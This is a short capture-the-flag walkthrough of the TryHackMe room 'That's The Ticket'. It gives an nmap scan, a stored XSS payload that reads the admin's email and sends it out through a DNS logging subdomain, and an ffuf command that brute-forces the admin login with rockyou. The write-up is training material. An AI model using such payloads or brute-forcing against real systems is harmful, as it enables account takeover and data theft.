This is a write-up/walkthrough of the room That’s The Ticket from TryHackMe.
First of all, we will do an Nmap scan
~ nmap -sC -sV -oN initial.nmap $IP
We get the following results
If we visit the website we see the following:
Click on register and create an account.
We then get taken to this dashboard:
We can try basic XSS in the ticket input:
This works and we get the following:
DNS and HTTP Logger
If we go back to TryHackMe, we see that it is recommending the HTTP & DNS Logging tool on http://10.10.10.100
We can now use the following XSS payload,
Getting the admin email
We can use the following XSS payload,
</textarea> <script> var email = document.getElementById("email").innerText; email = email.replace("@", "aaa") email = email.replace(".", "ooo") document.location = "http://"+ email +".6df3160f18c599e89ea88cfb89e13ee8.log.tryhackme.tech" </script>
And we will receive the following request:
Getting the admin password
We can get the admin password by bruteforcing with
ffuf -w /usr/share/wordlists/rockyou.txt -d "email=<ADMINEMAIL>&password=FUZZ" -u http://$IP/login -fw 475 -H "Content-Type: application/x-www-form-urlencoded"
This will get the admin password which we can login with
We can then read ticket 1 to get the flag!
And that is the room complete!